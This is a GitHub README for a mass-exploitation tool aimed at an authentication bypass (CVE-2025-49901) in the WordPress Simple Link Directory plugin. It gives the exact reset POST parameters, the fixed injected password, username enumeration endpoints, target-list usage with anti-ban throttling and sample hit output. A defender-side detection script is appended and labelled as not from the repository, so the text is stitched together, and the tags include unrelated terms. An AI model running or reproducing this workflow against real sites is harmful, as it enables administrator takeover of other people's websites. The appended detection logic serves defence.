Nxploited/CVE-2025-49901

GitHub: Nxploited/CVE-2025-49901

A PoC tool for the critical authentication bypass vulnerability in the WordPress Simple Link Directory plugin, providing automated probing and password-reset exploitation.

Stars: 0 | Forks: 0

# CVE-2025-49901 WordPress Simple Link Directory Plugin < 14.8.1 High-Priority Broken Authentication Vulnerability

```
╔═════════════════════════════════════════════════════════════════╗
║   CVE-2025-49901 · Simple Link Directory · qc-opd               ║
║   Authentication Bypass → Password Reset → RCE                  ║
╚═════════════════════════════════════════════════════════════════╝
```

![CVE](https://img.shields.io/badge/CVE-2025--49901-critical?style=flat-square&color=8B0000)
![CVSS](https://img.shields.io/badge/CVSS%203.1-9.8%20CRITICAL-red?style=flat-square)
![Plugin](https://img.shields.io/badge/Simple%20Link%20Directory%20%3C%2014.8.1-555?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=flat-square&logo=python)
![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square)

## ▸ Vulnerability Details

| | |
|---|---|
| **CVE** | CVE-2025-49901 |
| **CVSS** | **9.8 CRITICAL** — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Plugin** | quantumcloud Simple Link Directory (`qc-simple-link-directory`) |
| **Affected versions** | All versions **< 14.8.1** |
| **Authentication required** | **None** |
| **Vulnerability type** | Authentication bypass using an alternate path (CWE-288) |
| **CWE** | CWE-288 · Authentication Bypass Using an Alternate Path or Channel |

The `qc-opd` password reset form is exposed on the SLD page. It accepts a username and a new password but does not verify the user's identity through any token, e-mail confirmation, or capability check. An unauthenticated attacker can enumerate WordPress usernames, submit the reset form for an arbitrary account, and immediately authenticate with the injected password, thereby obtaining administrator privileges without any interaction with the target user.

## ▸ Attack Flow

```
┌─────────────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                                       │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form          │
│                                                                 │
│  2. Extract nonce                                               │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce                │
│                                                                 │
│  3. Enumerate usernames                                         │
│     /?author=1..10 + /wp-json/wp/v2/users + hostname            │
│                                                                 │
│  4. Reset password for each username                            │
│     POST qc-restore-pwd=restore                                 │
│          qc-uid=                                                │
│          pass=newhackerpass123                                  │
│          _wpnonce=                                              │
│                                                                 │
│  5. Verify access (dual mode)                                   │
│     Session mode  → cookie check + /wp-admin/ probes            │
│     Password mode → wp-login.php + admin panel check            │
│                                                                 │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt  │
└─────────────────────────────────────────────────────────────────┘
```

## ▸ Setup

```
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py
```

**`requirements.txt`**

```
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0
```

## ▸ Usage

```
Targets list file        → list.txt (one host per line)
Threads                  → default 5
HTTP timeout             → default 10s
Per-user delay MIN/MAX   → anti-ban throttle (default 0.3 / 0.7s)
Delay between sites      → default 1.0s
Output file              → scan_results/reset_mass_success.txt
```

**Target format:**

```
https://target1.com
target2.com
http://target3.com/wordpress
```

**Fixed password injected for every reset:**

```
newhackerpass123
```

## ▸ Username Enumeration Sources

| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` → `/?author=10` |
| REST API | `/wp-json/wp/v2/users` |
| Hostname | First label of the domain name, as a fallback |
| Hard-coded | `admin` is always included |

## ▸ Admin Verification Logic

After each reset attempt, the tool verifies administrator access using **two independent methods**:

```
Session mode   → checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  → full wp-login.php POST + multi-path admin panel probe
```

Admin indicators checked:

```
id="adminmenu" · id="wpadminbar" · id="wpwrap"
users.php · plugins.php · plugin-install-tab · upload-plugin
```

## ▸ Terminal Output Format

```
[HH:MM:SS] [https://target.com]  NONCE: OK   | RESET: OK | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -  | ACCESS: 0 HIT
```

## ▸ Output File

**`scan_results/reset_mass_success.txt`**

```
[2025-06-01T14:22:10] https://target.com - account=admin pass=newhackerpass123 mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123 mode=session
```

## ▸ Author

```
Nxploited (Khaled Alenazi)
GitHub   → https://github.com/Nxploited
Telegram → @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited)
[![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

## ▸ Disclaimer

```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems the operator does not own
or have explicit written permission to test. Unauthorized use violates the CFAA, CMA,
and equivalent laws worldwide. You alone are responsible for your actions.
```

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Fixed in 14.8.1
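As an added defender-side example (not code from this repository), the request pattern the attack flow section describes can be turned into detection logic. The script below scans constructed JSON request logs (a hypothetical format in which a reverse proxy or WAF records POST bodies) for author-id enumeration, REST user listing, and the unauthenticated `qc-opd` reset POST, and flags resets that use the tool's fixed password.

```python
import json
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample log (not from the page): one JSON object per line, in a hypothetical
# proxy/WAF format. 203.0.113.7 plays the scanning client; 198.51.100.9 is normal traffic.
SAMPLE_LOG = """\
{"ts":"2025-06-01T14:22:01Z","ip":"203.0.113.7","method":"GET","path":"/?author=1","body":""}
{"ts":"2025-06-01T14:22:02Z","ip":"203.0.113.7","method":"GET","path":"/?author=2","body":""}
{"ts":"2025-06-01T14:22:02Z","ip":"203.0.113.7","method":"GET","path":"/?author=3","body":""}
{"ts":"2025-06-01T14:22:03Z","ip":"203.0.113.7","method":"GET","path":"/wp-json/wp/v2/users","body":""}
{"ts":"2025-06-01T14:22:05Z","ip":"198.51.100.9","method":"GET","path":"/?p=12","body":""}
{"ts":"2025-06-01T14:22:09Z","ip":"203.0.113.7","method":"POST","path":"/links/","body":"qc-restore-pwd=restore&qc-uid=admin&pass=newhackerpass123&_wpnonce=deadbeef"}
"""

POC_DEFAULT_PASSWORD = "newhackerpass123"  # fixed password the README says the tool injects
AUTHOR_PROBE = re.compile(r"^/\?author=(\d+)$")
REST_USERS = "/wp-json/wp/v2/users"

def analyze(log_text, enum_threshold=3):
    """Return findings for the three observable stages of the attack flow:
    author-id enumeration, REST user listing, and the qc-opd reset POST."""
    findings = []
    author_ids = defaultdict(set)  # client ip -> distinct author ids probed
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        ip, path = ev["ip"], ev["path"]
        m = AUTHOR_PROBE.match(path)
        if m:
            author_ids[ip].add(m.group(1))
        if path.startswith(REST_USERS):
            findings.append({"type": "rest_user_listing", "ip": ip, "severity": "low"})
        if ev["method"] == "POST":
            params = parse_qs(ev.get("body", ""))
            # Reset signature: restore action + target user + new password, all supplied
            # by a client that never authenticated (no token, no e-mail confirmation).
            if params.get("qc-restore-pwd") == ["restore"] and "qc-uid" in params and "pass" in params:
                findings.append({"type": "unauth_password_reset", "ip": ip, "severity": "critical",
                                 "target_user": params["qc-uid"][0],
                                 "known_poc_password": params["pass"][0] == POC_DEFAULT_PASSWORD})
    for ip, ids in author_ids.items():
        if len(ids) >= enum_threshold:
            findings.append({"type": "author_enumeration", "ip": ip, "severity": "medium",
                             "distinct_ids": len(ids)})
    return findings
```

A reset finding is the high-confidence signal; the enumeration and REST findings are context that helps confirm the same client walked the whole flow.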
Tags: Alternate Path Authentication, Broken Authentication, CRITICAL, CVE-2025-49901, CVSS 9.8, CWE-288, Python, qc-opd, qc-simple-link-directory, RCE risk, Simple Link Directory, StruQ, WordPress, WordPress plugin, anti-forensics, security assessment, password reset bypass, plugin vulnerability, no backdoor, no authentication required, unauthorized access, vulnerability disclosure, authentication bypass, identity verification bypass, reversing tool